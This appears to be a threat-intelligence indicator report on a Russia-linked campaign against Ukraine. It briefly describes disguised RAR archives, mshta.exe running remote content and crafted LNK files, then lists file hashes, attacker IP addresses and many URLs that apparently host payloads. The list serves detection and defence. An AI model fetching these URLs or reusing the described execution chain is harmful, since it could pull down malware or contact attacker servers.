Armageddon is more than a Grammy-nominated album
June 26, 2024, 8:27 a.m.
Description
This report details a Russia-linked threat actor targeting Ukraine, employing various obfuscation techniques. The malicious activity involves dropping a compressed file disguised as a RAR archive, which fetches a remote image likely for tracking execution. The payload employs mshta.exe to execute remote content and leverages LNK files with crafted filenames. The techniques suggest an effort to evade detection and hamper analysis.
Tags
Date
- Created: June 26, 2024, 8:18 a.m.
- Published: June 26, 2024, 8:18 a.m.
- Modified: June 26, 2024, 8:27 a.m.
Indicators
- ff6029cbbf66db06113a576533d2fdca734c4a44338625cbf58929c9ee87e26a
- f79b723fa88f39d5df67f2517b088a12b490673fa07d6a2b35275f7dc573172e
- ee237449f2ad354fbe15e9505a96f6682dd66ca8277e93c7424c751d6da201ff
- eb49a27fb886dab6d90cb5f68e9c753ae408ee656aa942bebe7ac5b2fc68891a
- eaec8cc4876f8e85f387cee5f1443ae48858f7b5b36be395ea0c139c1367d8de
- eb0bf4fd7f6653c7083f3e691d566cecc0049e94308f54c8d64af34a54bc78a1
- e21ac7085a3e38942016f3cb8db4d2f3ba0e7846c7ffb0cc7eb1d2bc0953d6d4
- e18cb739dbb3ab86803db71bf93d407a8bbabfa836eabc85a3133dfc126eb94b
- df7e86b3a3c577285b7d00671b93c759cf973a90f2cce0cbff1ace7247015c30
- dbf1d945dd6869885a5effcda12e81a626079fb9bb66ede8bb58c3e5539465d2
- d20ad28197210f72947f4f14e6a5dd6aafcbf4309d46e8a1bf7f18d107784b77
- ce3f4bd2a8c548165ec2a0f41d0bbd1ad5e87a2aebc026e82f15c956ba51ed3d
- cddaa6af9fa15fb2e6a8bfffab0fade552331cedac28a179ee9f49dfef37aea1
- cd05c4daf81a06e1941833734b20c1b2427e9cbf9b86c1c7fc6515f27932970b
- c901f2188065c443575a84249ce012faa735657b79e6dd5dc6697358d59fb574
- bd514e1622e557c80252bd000060e8221c651e485a43e795fce47ab60a1d8468
- bccaa77cf271e8e2c4aaf9982154e8166445c05274d3f58a8352b5daf0ffa3c9
- b0b962951434ff103d45db66096e04d468c757379081e6ef534da800ed6a6cef
- a8e291d181c01f7e25e14910b60755d0d439ab1d8616ce0e122514b3fed3dc52
- a459022936dbffe74089f1ed8160303f1fe909ff459842397d507c0b198a5ee1
- a2376a67640be242bec5c9ffe46822abab2361f7210a8d9ad6333df45e67117f
- 9e774b37b930c3f0c79311f6de448bc5602e16edfef92f4ff09645f27217cdea
- 9de40cb245c783935d8a7c809262f91f6a511baed67d758b7c48de7b3505e7b0
- 8e5f93ffef422ac9f6f19b840509aba5ae88aa39d846c1e40f04b26c4d20cf79
- 908b8f5f73ab2dfc7bf3070868d219d1b45f8e2d1f560162dddfd6ce19ed7592
- 8d660b8e4b5ad82aeeee594545d400483662630d301e832ee35627695a746f95
- 8c8a3457007f6e2d1d75715d21b0423e9c6b90fd2e62f7b4398180017e3f768f
- 8ab7601d03c890a078ac9f8763c950b24b5908cb76559110a65dc1d2e4385097
- 89feb40e4a98e3592054dbd8c4d47a9edbeb308659cf4d1ef9e3deba6f38a698
- 84bd6f3182ab398d5363fd6b8a375641e08c57318225714a618ffb6b6b10aefb
- 841585615fc9cb62b0f8410f1a4df38e7d11cc4b48c54e75dcdc051e9308257e
- 7be88e131a6e180f32aab59734be70ac57d773c5b68bd7919dd32f6f6f9b3de1
- 7ab474672b5b9a86fd1b00ab6ec5d2164ecab9cf846ebccb65202ed68d65eaf1
- 78e1b171afbae8b994792bb33a0bf41f39d596def43a6b3e1ac28d7dd27bb8ca
- 7694a7f4764b9015fe00f68cd75d06f7dae77fd64c58c9bcb83fd8196cc17d4b
- 6b78350cfdff778ae68b47980deeb8841d0a8a2488eb3cb6ce500758df66544e
- 6d2f57de35671937d6134bf4d2fdbfe6310a6b184dceecdeaa7f4583eb0ab6f6
- 602b1284193f71ab87a9b8d656bfd858f113e2f1a9d85d8331740d2c852a075b
- 5cf828715c004f42eea066b4935511ecb42a4e150235faee482b06904af83cc7
- 511eb0f06e4c528be6627d537b118bf4932f5a90adc81a3e986beea90f14fe77
- 55a49f62bdd66c6d6a84f476aa0f64a9b27376164ae1875e273ce9bec2eb7f43
- 4ade1dc7f4558df1ccc96433e5b26872ab283fcd39e4a3f070480ea62d3e9f30
- 4a98d11230dc0ab117534f78a9d626b754c0c9d7957a8d343a8f0e7a332f68ce
- 4520da04e857ac097daa03500ed553ed49ec00e6fc0f349b977a11bbe1ec0924
- 451f0b06775ab715249635fc6930db45bfa4bd343f448b33a49f4941653a7315
- 4347d7b2d8d180978f4646ccc457be2de0d0c7db84896e1bcd250d2d834a37b1
- 40f3e18c474e02c71620c611e2e3827793d7f07d26cc49396be500baa37dc872
- 406a09578b07415880b035cb8afd688465ffd28a9c7c46680987295ce50d8840
- 3b5c1f5df0d1d76ee58cf859557f03df35692f2a57d10c111ebdec9f69ac4b34
- 3afc8955057eb0bae819ead1e7f534f6e5784bbd5b6aa3a08af72e187b157c5b
- 304e8e18068a34c6aed82d0ad744f94687c08842a51e525a87d22a65db2334e5
- 268061a244d56a5347ae66364f6a1cf6ab5654d19086fae6d5607b95d8fc793c
- 21623210a29df18c000dbf3fcc5bb4885e8a03915f47b152a93a07f66eb2e90f
- 1ec58003c6b7625935976bdfdf7d4a11228a57b32ce1eeece68a1ab48536bbc0
- 1915bb1784b164307af70a70e3264cfe3bc3c82c43e49da59c0c592d4d29af43
- 15ce500029cae11a5b07ed654faa371ef0bb0eb9add630a1e03c58606ea35eb9
- 1543723a1dcc8f5638cd43c5882f132b554c248b334473098fc49ae007e8ee4e
- 0c0534d036dcf5cc5152b2dcb03e837b5bf8c66481d283bd637373cd49b66f7f
- 062c25a86461f7f8d392e93bd97836773a889adbdbac9d2ce11e65860a4f2af2
- 00494102c3d9fd8ab40d8e7b3f8a1d4e30876257c18c45761922edf938970719
- 194.180.191.72
- 194.180.191.34
- 194.180.191.31
- 194.180.191.12
- 185.225.19.69
- 185.225.19.13
- 94.158.247.32
- 194.180.191.15
- 194.180.191.41
- http://94.158.247.32/sb.15.04
- http://94.158.247.32/pr/quickly.bmp
- http://94.158.247.32/pr.11.04
- http://94.158.247.32/odd/selected.bmp
- http://94.158.247.32/mou/reign.bmp
- http://94.158.247.32/odd.15.04
- http://94.158.247.32/mou.15.04
- http://94.158.247.32/moh.17.04
- http://94.158.247.32/fes.17.04
- http://194.180.191.72/c/haze.pdf
- http://194.180.191.72/c.19.06
- http://194.180.191.41/omr/deal.pdf
- http://194.180.191.41/omr/bananas.pdf
- http://194.180.191.41/omr.11.06
- http://194.180.191.34/sukr.19.04
- http://194.180.191.34/sukr/regard.tmp
- http://194.180.191.34/siz/bandage.tmp
- http://194.180.191.34/siz.19.04
- http://194.180.191.34/prob.18.04
- http://194.180.191.34/gps.19.04
- http://194.180.191.34/pr.18.04
- http://194.180.191.31/zaliz/regions.tmp
- http://194.180.191.31/zaliz.23.04
- http://194.180.191.31/odes/relief.tmp
- http://194.180.191.31/odes.24.04
- http://194.180.191.15/ods/predator.zip
- http://194.180.191.15/ods.06.06
- http://194.180.191.12/od/barren.7z
- http://194.180.191.12/od.04.06
- http://185.225.19.69/gm/decency.zip
- http://185.225.19.69/gm.03.05
- http://185.225.19.13/c/intention.pdf
- http://185.225.19.13/c.18.06
Additional Informations
- Ukraine